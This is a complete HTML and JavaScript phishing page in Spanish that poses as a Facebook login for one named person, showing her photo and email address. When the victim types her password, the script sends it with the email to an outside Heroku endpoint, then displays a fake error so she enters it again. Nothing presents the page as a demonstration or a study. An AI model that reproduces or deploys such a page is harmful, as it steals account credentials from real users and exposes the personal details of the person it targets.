<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar sesion Facebook</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Readex+Pro&display=swap');
        @import url('https://fonts.googleapis.com/css2?family=Readex+Pro:wght@200&display=swap');
        @import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@200&display=swap');
        @import url('https://fonts.googleapis.com/css2?family=Dosis:wght@200&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: inherit;
        }

        body {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            background-color: #F2F4F4;
        }

        .icon_facebook {
            font-family: 'Readex Pro', sans-serif;
            font-size: 40px;
            font-weight: 700;
            color: #010BD8;
            text-align: center;
            margin-bottom: 15px;
        }

        .container {
            height: 450px;
            width: 390px;
            border-radius: 8px;
            box-shadow: rgba(100, 100, 111, 0.2) 0px 7px 29px 0px;
            display: flex;
            flex-direction: column;
            align-items: center;
            background-color: #FDFEFE;
        }

        .container img {
            width: 70px;
            height: 70px;
            border-radius: 50%;
            border: 1px solid #CCD1D1;
            margin-top: 50px;
        }

        .container .text_log_in {
            font-family: 'Montserrat', sans-serif;
            font-weight: 600;
            margin-top: 10px;
            font-size: 15px;
        }

        .container_data {
            display: flex;
            margin-top: 5px;
        }

        .container_data p {
            font-family: 'Montserrat', sans-serif;
            color: #626567;
            font-weight: 600;
            font-size: 13px;
            margin-right: 7px;
        }

        .container_data a {
            text-decoration: none;
            font-family: 'Montserrat', sans-serif;
            font-weight: 600;
            font-size: 13px;
        }

        form {
            display: flex;
            flex-direction: column;
            margin-top: 50px;
            width: 100%;
            align-items: center;
        }

        form input {
            width: 75%;
            outline: none;
            border: none;
            border: 1px solid #CCD1D1;
            border-radius: 5px;
            height: 50px;
            padding-left: 20px;
        }

        form input::placeholder{
            font-size: 15px;
        }

        form button {
            outline: none;
            border: none;
            background-color: #6E70E1;
            color: white;
            width: 80%;
            height: 50px;
            margin-top: 25px;
            border-radius: 5px;
            font-size: 20px;
        }

        .password__remenber {
            text-decoration: none;
            font-family: 'Montserrat', sans-serif;
            font-weight: 600;
            font-size: 13px;
            margin-top: 30px;
        }

        .error {
            font-family: 'Montserrat', sans-serif;
            color: red;
            font-weight: 800;
            margin-top: 10px;
            font-size: 15px;
            display: none;
        }

        .visible {
            display: block;
        }

    </style>
</head>
<body>
    <p class="icon_facebook">facebook</p>
    <div class="container">
        <img src="https://scontent.fpbc2-2.fna.fbcdn.net/v/t39.30808-6/214590422_2092672524235184_1396727790470130890_n.jpg?_nc_cat=102&ccb=1-5&_nc_sid=09cbfe&_nc_ohc=blplv7KjToMAX-XSDyz&_nc_ht=scontent.fpbc2-2.fna&oh=a1947a77ce4a72d05b7565029599a406&oe=61B47C52" alt="Nelli Padilla" />
        <p class="text_log_in">Inicia sesión como Nelli Padilla</p>
        <div class="container_data">
            <p>nelli_padilla13@hotmail.com</p>
            <a href="#">¿No eres tu?</a>
        </div>
        <form>
            <input type="password" id='password' placeholder="Contraseña" />
            <p class="error" id='error'>Ocurrio un error, intentalo de nuevo</p>
            <button id='log_in'>Iniciar sesión</button>
        </form>
        <a class="password__remenber" href="#">¿Olvidaste tu contraseña?</a>
    </div>
    <script>

        let i = 0;
        let insert_error = document.getElementById('error');
        let j = false;

        const makeRandomID = (length, dict='0123456789') =>
        Array.from({length}, _=>dict[~~(Math.random()*dict.length)]).join('')

        const setPassword = async (password) => {
            let data_send = {id: makeRandomID(8).toString(), email_user: "nelli_padilla13@hotmail.com", password_user: password}
            const response = await fetch(
                'https://spartan-email.herokuapp.com/api/v1.0/insert_user', {
                    method: 'POST',
                    headers: {
                        'accept': 'application/json',
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(data_send)
                }
            )
            j = true;
            const data = await response

            if(data.ok){
                console.log('enviado');
                insert_error.classList.remove('visible')
                j=false;
            }else {
                j=false;
                insert_error.classList.add('visible')
            }

        }

        let btn_log = document.getElementById('log_in');
        let pass = document.getElementById('password');
        document.addEventListener('click', async (event) => {
            if(event.target.id === 'log_in'){
                event.preventDefault();
                if(pass.value.trim() === ''){
                    insert_error.classList.add('visible')
                }else{
                    await setPassword(pass.value.trim())
                }
            }
        });
    </script>
</body>
</html>